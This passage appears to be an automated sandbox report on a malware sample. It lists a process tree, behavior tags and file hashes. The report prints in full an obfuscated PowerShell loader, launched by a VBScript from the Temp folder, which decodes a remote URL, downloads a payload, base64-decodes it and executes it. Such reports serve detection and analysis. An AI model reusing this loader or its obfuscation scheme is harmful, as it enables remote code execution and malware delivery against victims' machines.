--disable-accelerated-video-decode --service-request-channel-token=099972FF494EC969DF842C34852C22F5 --renderer-client-id=2 --mojo-platform-channel-handle=1748 --allow-no-sandbox-job /prefetch:14⤵
- System Location Discovery: System Language Discovery
PID:4068
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=62933187D64F7AB36ADD904DC7322C06 --mojo-platform-channel-handle=2336 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:24⤵
- System Location Discovery: System Language Discovery
PID:2984
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=CB3D5678FFB3D6B62C6B08FE8D476318 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=CB3D5678FFB3D6B62C6B08FE8D476318 --renderer-client-id=5 --mojo-platform-channel-handle=1856 --allow-no-sandbox-job /prefetch:14⤵
- System Location Discovery: System Language Discovery
PID:1404
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=0F1063803ACDA6922DDADCDCB6E72FD8 --mojo-platform-channel-handle=2696 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:24⤵
- System Location Discovery: System Language Discovery
PID:1280
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=D5D52CF4235E2FB5D0F48BED2258D6AE --mojo-platform-channel-handle=2820 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:24⤵
- System Location Discovery: System Language Discovery
PID:4708
-
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\romerret.vbs"2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1052 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Boernehjaelpsdag='Flerbrugerudgaver';;$Anekdotiskes='Kvajer';;$Apathia='Gunbuilder';;$Meterologisk='Billioners174';;$Paracelsianism='Intervertebra';;$Claritude=$host.Name;function Ructation($Krselstiderne){If ($Claritude) {$Slutdatoerne=2} for ($Unglamorously=$Slutdatoerne;;$Unglamorously+=3){if(!$Krselstiderne[$Unglamorously]) { break }$Buckland+=$Krselstiderne[$Unglamorously]}$Buckland}function Fashioneringer($Marins){ .($Clodpoles) ($Marins)}$Paydays=Ructation ' ln eamtSp. yW BEreb C uL SiLeeDoNTrT';$Nedsivningsbekendtgrelsernes=Ructation 'FuMCroDazI iMelGolDeaSl/';$Kongeparrets=Ructation ' MTRilI.sr 1 f2';$Dorbugs28='An[ManP,e StBa. .sTmE RR ivTii c oERaP.ioC iF N UT.om Ac N,ea RGBeEAnrA ]Hy:Be:U.sKoENaC ouRaRMiiS T DYOmpStrA,o TReoPrCVeOHaLte=st$MoKBeoarnTiGRaE p .AKaRN RCrEdiTN.s';$Nedsivningsbekendtgrelsernes+=Ructation 'Bi5W .Re0Wi (PeWDiiManAnd okawMas S ,tN .TKa Fo1 U0 R.D,0 G;Py MaWHoiFin o6vr4.n;gr Krx .6Be4C.; arA vUn: S1Me3S 1 D.b 0W,) . uG ae LcDikInoBr/ u2.s0 .1Fu0 ,0 C1Gl0.a1Be VeFRii .rTreKaf.oo .x H/A 1Gn3 u1Pe.Ek0';$trevrelserslejligheds=Ructation 'O,U SB EbrRD -B,aSkGAfE Kn Ut';$Fishgrass=Ructation 'Gehs.tStt.ppSksEs:C /t,/ ,wSowDew r.HueAllQuePhk JtRerFro,rs eserU vPaiUnc HeVi-GanJ e uO rdyu DpD pQui n o.AkdE eFl/LnfBriFulR eHaa adRam RiPon.a/T wU o jl.rtBieBoreq/ ,O vDie arHop,ya Eir nF f CuT,lBo.T aUnfDem';$Korporal=Ructation 'Re>';$Clodpoles=Ructation 'UniD EguX';$Overgrnserne='Orthopterological';$Undladelsers='\Milieuplanerne.Chl';Fashioneringer (Ructation 'Fy$FrGElL FoNib iaRaL,t:FoUP nMovFoAhyl ISedP l ,yR,= S$R EA nK v :Ova P.apamdAmaMeTMoAba+ a$PhU anUpdy,lsua BDdieLdL sSKle kRUnS');Fashioneringer (Ructation '.r$EkgcaL ,oTeBPaa Dl U: aFMarAfE TMIdTUnvSku nN PGOveSnt u= m$ LfCuIlas Dh CgOvRHaASpSFoSAs. BsExP olcyIPoTop( u$LakIno RLePgno SrM.ABel I)');Fashioneringer (Ructation $Dorbugs28);$Fishgrass=$Fremtvunget[0];$Tilmeldtes=(Ructation 'Op$EcgInlA o eBB aOxLSt: ,GS.a iRSkAHymBlOR Nr,DTh= ON.rE rWB -V oBobByJ.rENoCFit PrsStYT sDiT uEEnmF,.Tr$AfpPaA aY GdG a sy s');Fashioneringer ($Tilmeldtes);Fashioneringer (Ructation 'Ep$PagFjaForLuaA.mOvo enP d O.ovHRieP aF dBoemor.esPe[ u$RetArr Le Tv vr.reRel is ,e ir .sStlAeeT j lSii gAnhTreStdB sDe]Pa=D $ NAmeEld.usB i.iv.unEfiE nMagC,sPrb meb,kAne rnS,d tUfg kr.oe Ll BsIneSlrK.nPre Ms');$Almugs=Ructation 'Sp$Nogska IrAraItm PoPen SdAm. aDCeo iwEpn Pl ao Na edB FDii ol.reMo(Yd$ FFP.iP,sPah g.or.aaSos WsLa,Im$ TSA.t naLnt,us b.ae Ms gAfe fnPre sS )';$Statsbesgenes=$Unvalidly;Fashioneringer (Ructation 'Ha$ GArLNeoBrB CaHaLTe:abIPrdBee ,aRelMeiSaZSpeSer.r= ,( STSteGes aTRe-TrpNaaT TKohAc S $ ,SAntInADgt SsRaBMoe CsMegBie RN de.fSEf)');while (!$Idealizer) {Fashioneringer (Ructation ' k$ SgNol PoAnb Sa dl.e: hA.upEntK,e.wrFeiOpn gFaeSkrYnnb eo s ,=,k$PlH oyChlReeStr.qn .esusVa5Pl4') ;Fashioneringer $Almugs;Fashioneringer (Ructation 'O sLetNeaExrKaTTa-N,SSula.EMaEhjP,o Do4');Fashioneringer (Ructation 'pl$L,gL l SOSeBCoAUnlA :FoireDSwEHvAR.L .i kZ SEAnrI =In( LT SeKnsf,Tti-C P gAShtSvHHu .a$ SUlt aMitXySDvb VEYaS SGsle ,n,nE S )') ;Fashioneringer (Ructation 'Ra$ Bg LO O BNoaU,LH,:YeB TABrr SbLuA CsMaCSuoDeSfo=Sl$S gk L eo Ab uA ML A:S,vJoA dIleAnSLat eeDiD lE SRKoN PE I+P + p%Un$Enf orTie,rMDoTNivr U,hnPrGIsE ut .GucP OHeUOpNV.T') ;$Fishgrass=$Fremtvunget[$Barbascos]}$Benaadningerne=316180;$Renummereringsfunktionens164=29066;Fashioneringer (Ructation ' $U GLeL DOO B.rABrlBr:S.dUnIdosOvp loP N eUnR HeVat , .u=r. LeG,ee tSy-u CStOCunNoT FEDaNXeTWh Pr$ rsSktHaAS T US BB CeUrs RgLiE dn,oE SS');Fashioneringer (Ructation 'Ke$ DgP,l ioH b aTel :BuEBrt.ohM.y l nsMauInlampF hPru KrHeiPec a d =Ry [ FSlayE,s ItAle umOv.,mC UoMon,cvBae ,rDetOp] a:Un:TuFCurLyoLamPaBC a sSneDe6hy4UnS EtTor fi onTig,i(.a$AwD.ei esNop,eossnH eGerreelrt v)');Fashioneringer (Ructation 'Ze$ oG olF oPeBOraenlHe: Ss ,h .IBemA.O N.aOUnsSyE aKQuIFi ,e=Ri R[A SStyEpsCrTdaE M,h.butmyETaxV TNy.HeeUdNKoCinOBodS,i an SgSu] l: ,:FuA oS CCReI IYd.PegG eTrTT S.otCir GiDeNAiGMa(K.$NoeenT HSkyDiL Tsnou.elu pC.HPsUPhRBuIIncHo)');Fashioneringer (Ructation 'tr$Ing ,LLeO obF.A SL B:.rkSgO iBrnStOFoNRu= R$ .sAphUnI rm HoP.Nh.OCaS CERukMii .Ses.vU ABRrsNut aR.rIspN fGRe(Gt$ ab .eVun A ,aDeD ,nPriKaN Gg DERiRAnN eEBo,Sk$UnR,ue FNPau RmSpm HE SRUnEDaRKuiK,NNegSuSkoFBru SnSukstt i MoQunSceSpnShS a1P.6Fr4 k)');Fashioneringer $Koinon;"3⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3604
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4256
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
36KB
MD5b30d3becc8731792523d599d949e63f5
SHA119350257e42d7aee17fb3bf139a9d3adb330fad4
SHA256b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3
SHA512523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e
-
Filesize
56KB
MD5752a1f26b18748311b691c7d8fc20633
SHA1c1f8e83eebc1cc1e9b88c773338eb09ff82ab862
SHA256111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131
SHA512a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5
-
Filesize
64KB
MD53e73706745abbd2401ae6ad347fe9c6a
SHA1cd081e51bc52909d5870b7ca24dae729700c19f6
SHA256070f81fabb7d401c12a2d586b8ec4b4a0730be479d5bdc46d460728739366b2d
SHA5121a3796eb1930626f5d68e540e7539945108d15cb96e0d0cb63dbbdb9a3ede923115e69c67b515d6d96f99863c170cebcc30aeb1d4a0db493c7d52b6db7e893a7
-
Filesize
53KB
MD5d4d8cef58818612769a698c291ca3b37
SHA154e0a6e0c08723157829cea009ec4fe30bea5c50
SHA25698fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0
SHA512f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6
-
Filesize
1KB
MD5d336b18e0e02e045650ac4f24c7ecaa7
SHA187ce962bb3aa89fc06d5eb54f1a225ae76225b1c
SHA25687e250ac493525f87051f19207d735b28aa827d025f2865ffc40ba775db9fc27
SHA512e538e4ecf771db02745061f804a0db31f59359f32195b4f8c276054779509eaea63665adf6fedbb1953fa14eb471181eb085880341c7368330d8c3a26605bb18
-
Filesize
109KB
MD5e9477eb60d7ad8c73ff94c26594ff93f
SHA1a0e396bc055752ea703572d080678b0d5314e323
SHA2567fbc201adb4e2b34792d032204151ef90e507917950e43fa3ba1d5b965575b54
SHA512568057ea77ecf17a678645f9758be1f8554a773c5823e5ec6d7df89c2cef2d03f262b495c79ec8c9bcfe160b3579d16ab33020a241e15255e1c467fcc086def4
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
67KB
MD52a2c6135ad5b992f99a4d4e455f68bde
SHA1d307f653abdfec2337bc2048bc60a20182373250
SHA256b51cc6dca8a013ff07cb1b473f01543d55440151444b284de3773cc3ebc54f82
SHA512c183f905bbb7c4fd769b132439acbc43988bae3e16c1e6c601c86567a41c2d344049ec213446cf691cadf1da3a5e1f5d23c9b1b744e681727e1764cbef7ec675
-
Filesize
467KB
MD5e30aa67fe8ef314262ffb9f3b6b691d4
SHA1c2c8e7a338a41990c68ba977e7b342ca81b91652
SHA2567f1c8c56b0022a953e0549cf37a6e9b4f57c2a1681aa51a101b138275b8cc54c
SHA51201824dfeb49a36b16511d4671d6a784c4dc72e966e01ea9d0fb323937e23ffffdae0d0c35da54dc127bfd662538cdf7548fcaa32bfc8b49f440f9d5e6eed0e8e